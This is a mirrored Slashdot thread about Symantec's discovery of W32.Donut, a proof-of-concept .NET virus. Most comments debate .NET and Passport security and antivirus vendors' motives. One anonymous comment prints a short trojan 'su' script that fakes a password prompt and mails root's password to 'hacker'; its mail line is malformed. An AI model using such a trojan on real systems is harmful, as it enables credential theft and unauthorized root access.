Slashdot Mirror

← Back to Stories (view on slashdot.org)

First (proof-of-concept) .NET virus

Posted by ryuzaki0 on from the guess-that-isn't-surprising dept.

Juergen Kreileder writes "Symantec says they've received W32.Donut, the first .NET virus: 'This virus targets EXE files that were created for the Microsoft .NET framework. W32.Donut is a concept virus. It does not have any significant chance to become wide spread. However it shows that virus writers are paying close attention to the new .NET architecture and attempting to learn how to exploit it before the Framework will be available on most systems.'"

12 of 384 comments (clear)

  1. .NET? by MantridDronemaker · · Score: 2, Interesting

    Heh I still haven't fully figured out just what .NET is - as near as I can figure it's a framework to allow for easier Application Hosting? I also get the idea that MS is going to be cramming it down our throats :)

  2. Even if I hate .NET, I have to be realistic... by 2Flower · · Score: 4, Interesting

    .NET is dangerous. It's a security disaster waiting to happen. I don't want to use it if I can avoid it...

    See last sentence. WILL we be able to avoid it, realistically? A lot of /.'ers might be able to, but folks who still have to live and work with Microsoft products in the workplace or even at home and want to get things done online might not have a choice. If online shopping services convert over to .NET or god forbid my bill payment services, it's going to be very difficult to avoid having to make that Passport account and start using .NET.

    So, taking the hypothetical stance that one would need to eventually get registered to use .NET services they can't avoid using, what can be done to protect yourself and your data? Are there any .NET developers out there who can comment on how much risk is involved and how it can be minimized beyond 'Don't use it'?

    1. Re:Even if I hate .NET, I have to be realistic... by Jason+Earl · · Score: 5, Interesting

      AOL will almost certainly throw their millions of users towards some other system, and web sites will be forced to support both AOL's system or Microsoft's, or neither (they will probably just stick with whatever they are doing now).

      Trust me, Microsoft's Passport numbers look impressive, but that's almost entirely due to Hotmail (which Microsoft doesn't charge for). In other words they have a load of crap data, and they are just now trying to get folks to actually associate this information with useable information like credit card numbers. To make matters even more interesting, Microsoft has had several well published security exploits. Only the dimmest of dim bulbs is going to trust Microsoft with their billing information (especially since chances are good that all of the places that they purchase things online already have this information). AOL, on the other hand, already has billing information for each and every one of their customers. They have literally got exactly what they need to make Internet Shopping truly painless.

      Better yet, there is at least some chance that AOL will share their Passport equivalent, which will almost certainly spread to other large ISPs.

      And finally, every eCommerce site currently in existance already has a way to charge you money. They aren't likely to throw their old software away and change to a .NET only site. Microsoft is the only company I can think of that has a good reason to force paying customers towards .NET.

  3. Silly Question by Anonymous Coward · · Score: 1, Interesting

    This begs the question - it sounds like this virus was written for the benefit of the virus companies (but aren't they all....)

  4. Origin? by jbailey999 · · Score: 5, Interesting

    If I remember right, the original word-macro "concept" viruses infected all of the inside of Microsoft within days and had a total payload of "See, I told you it could be done." Several news sources suggested that it was written inside Microsoft by a tech to prove a point.

    I wonder if this too, was a similar sort of event.

  5. Symantec. by ImaLamer · · Score: 3, Interesting

    Don't forget everytime a new version of Windows comes out Symantec gets to sell a million copies of it's software.

    I know most people won't agree, but doesn't Symantec stand to make a mint if this is true?

    I guess they needed a virus before they released anti-virus software.

    --
    Get your Unix fortune now!
  6. Worrisome first volley by begonia · · Score: 5, Interesting

    Java, of course, is composed of byte code that runs in a "sandbox" which is supposed to prevent malicious attacks on a user machine. Say what you want about Java, but from what I can tell Sun has been pretty successful in achieving their security goals.

    OTOH, Microsoft, jealous of Java's success, is attempting a similar model and boasts similar security measures, claiming that with .Net Framework driven applications, it will be possible to download apps from the internet and run them without security concerns.

    The problem is that M$ is cutting a bunch of corners that make me very nervous. For example, the user only compiles a program the first time he runs it. After that a machine-code file is left on the user's machine for further runs. Also, M$ is attempting to mix "Managed Code" in with "Unmanaged Code". Their attempt is to make their apps run faster than Java code. But I'm afraid we're going to bear the misfortunes of their aggressive tactics, by being the real victims of a new wave of viruses exploiting these new holes...

    --
    RM
  7. Passport and .NET Security... by slashkitty · · Score: 4, Interesting

    Unfortunately, Passport, (which I believe offers the authentication for .NET services?) is really only secure as the least secure server it's deployed on. More unfortunately, it's deployed on microsoft.com. Even more unfortunately, there are still OPEN SECURITY HOLES on microsoft.com... Oh, how many many ways are their to hijack cookies or script actions with Cross Site Scripting? A lot.

    --
    -- these are only opinions and they might not be mine.
  8. Re:Virus Check every SWF, etc? by Anonymous Coward · · Score: 1, Interesting

    I guess you've never rooted anyone.

    profile:
    alias su="trojan_su;unalias su"

    trojan_su:
    #!/bin/sh
    echo "password: "
    line >> mail hacker -s "root's password"
    echo "bus error - core dump"

  9. The Score So Far by White+Roses · · Score: 2, Interesting
    .NET Virii: 1
    Java Virii: 0

    Seriously, wouldn't a Java virus be great? I mean, it runs on just about anything (including your PlayStation 2). I wonder why there aren't any roaming the net . . .

    Maybe because Sun actually put some effort into the security aspects of an inherently dangerous idea?

    --
    Do not touch -Willie
  10. Comment removed by account_deleted · · Score: 3, Interesting

    Comment removed based on user account deletion

  11. Conceptual Virii by mgallix · · Score: 1, Interesting

    Haha, good to know Microsoft has it's fans.

    Just like Dodge has their Concept Car (GT2 anyone) the virii folks have their concept virii, Microsoft will never catch a break.

    But I'm kind of scared about Linux virii, it's dangerous because it doesn't seem to be as much of a "problem" but it could be one day. And with most servers being run on apache, alot of those processes are started on linux boxes. Now imagine a virus that would span across all *nix enviroments, yikes!

    or *bsd yikkkes!

    Gallix

    --
    "The sum of the angles of that rectangle is too monstrous to contemplate." --Commissioner Gordon